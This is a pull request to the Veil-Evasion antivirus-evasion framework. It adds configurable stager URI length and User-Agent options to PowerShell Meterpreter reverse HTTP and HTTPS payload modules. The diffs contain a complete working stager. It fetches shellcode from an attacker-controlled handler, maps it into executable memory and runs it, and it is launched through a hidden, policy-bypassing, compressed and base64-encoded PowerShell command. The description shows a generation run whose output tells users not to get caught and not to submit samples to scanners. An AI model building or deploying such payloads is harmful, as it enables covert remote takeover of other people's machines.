### PR TITLE
Adding USER_AGENT and STAGERURILENGTH options.

### DIFF
--- a/modules/payloads/powershell/meterpreter/rev_http.py
+++ b/modules/payloads/powershell/meterpreter/rev_http.py
@@ -22,7 +22,9 @@ class Payload:
         self.required_options = {
                                     "LHOST" : ["", "IP of the Metasploit handler"],
                                     "LPORT" : ["8080", "Port of the Metasploit handler"],
-                                    "PROXY" : ["N", "Use system proxy settings"]
+                                    "PROXY" : ["N", "Use system proxy settings"],
+                                    "STAGERURILENGTH" : ["4", "The URI length for the stager (at least 4 chars)."],
+                                    "USER_AGENT" : ["Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)", "The User-Agent header to send with the initial stager request"]
                                 }
 
 
@@ -35,18 +37,18 @@ class Payload:
 "@
 try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
 function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
-function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
+function t {$f = "";1..%i|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
 function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
 function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
-$m = New-Object System.Net.WebClient;%s$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)")
+$m = New-Object System.Net.WebClient;%s$m.Headers.Add("user-agent", "%s")
 $n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/$n" )
 $o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
 $x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
-$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %("" if self.required_options["PROXY"][0] == "N" else proxyString,
-                                                                                 self.required_options["LHOST"][0], self.required_options["LPORT"][0])
-
+$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %((int(self.required_options["STAGERURILENGTH"][0])-1),
+                                                                              "" if self.required_options["PROXY"][0] == "N" else proxyString,
+                                                                              self.required_options["USER_AGENT"][0],
+                                                                              self.required_options["LHOST"][0], self.required_options["LPORT"][0])
         encoded = helpers.deflate(baseString)
-
         payloadCode = "@echo off\n"
         payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("
         payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)

--- a/modules/payloads/powershell/meterpreter/rev_https.py
+++ b/modules/payloads/powershell/meterpreter/rev_https.py
@@ -47,7 +47,6 @@ $o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" 
                                                                               "" if self.required_options["PROXY"][0] == "N" else proxyString,
                                                                               self.required_options["USER_AGENT"][0],
                                                                               self.required_options["LHOST"][0], self.required_options["LPORT"][0])
-        print(baseString)
         encoded = helpers.deflate(baseString)
 
         payloadCode = "@echo off\n"

--- a/modules/payloads/powershell/meterpreter/rev_https.py
+++ b/modules/payloads/powershell/meterpreter/rev_https.py
@@ -22,12 +22,13 @@ class Payload:
         self.required_options = {
                                     "LHOST" : ["", "IP of the Metasploit handler"],
                                     "LPORT" : ["8443", "Port of the Metasploit handler"],
-                                    "PROXY" : ["N", "Use system proxy settings"]
+                                    "PROXY" : ["N", "Use system proxy settings"],
+                                    "STAGERURILENGTH" : ["4", "The URI length for the stager (at least 4 chars)."],
+                                    "USER_AGENT" : ["Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)", "The User-Agent header to send with the initial stager request"]
                                 }
 
 
     def generate(self):
-
         proxyString = "$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;"
         baseString = """$q = @"
 [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
@@ -35,16 +36,18 @@ class Payload:
 "@
 try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
 function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
-function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
+function t {$f = "";1..%i|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
 function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
 function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;%s
-$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/$n" )
+$m.Headers.Add("user-agent", "%s");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/$n" )
 $o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
 $x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
-$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %("" if self.required_options["PROXY"][0] == "N" else proxyString,
+$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %((int(self.required_options["STAGERURILENGTH"][0])-1), 
+                                                                              "" if self.required_options["PROXY"][0] == "N" else proxyString,
+                                                                              self.required_options["USER_AGENT"][0],
                                                                               self.required_options["LHOST"][0], self.required_options["LPORT"][0])
-
+        print(baseString)
         encoded = helpers.deflate(baseString)
 
         payloadCode = "@echo off\n"


### PR DESCRIPTION
Adding the USER_AGENT and STAGERURILENGTH options so that they can be customised quickly during payload generation 

```
# /opt/Veil-Evasion/Veil-Evasion.py -p powershell/meterpreter/rev_http -c LHOST=MSF-HANDLER.com LPORT=80 PROXY=Y STAGERURILENGTH=8 USER_AGENT="Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" --overwrite
[...]
=========================================================================
 Veil-Evasion | [Version]: 2.22.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Payload: powershell/meterpreter/rev_http


 Language:		powershell
 Payload:		powershell/meterpreter/rev_http
 Required Options:      LHOST=MSF-HANDLER.com  LPORT=80  PROXY=Y
                        STAGERURILENGTH=8  USER_AGENT=Mozilla/5.0 (Windows
                        NT 6.1; Trident/7.0; rv:11.0) like Gecko
 Payload File:		/usr/share/veil-output/source/payload.bat
 Handler File:		/usr/share/veil-output/handlers/payload_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)
```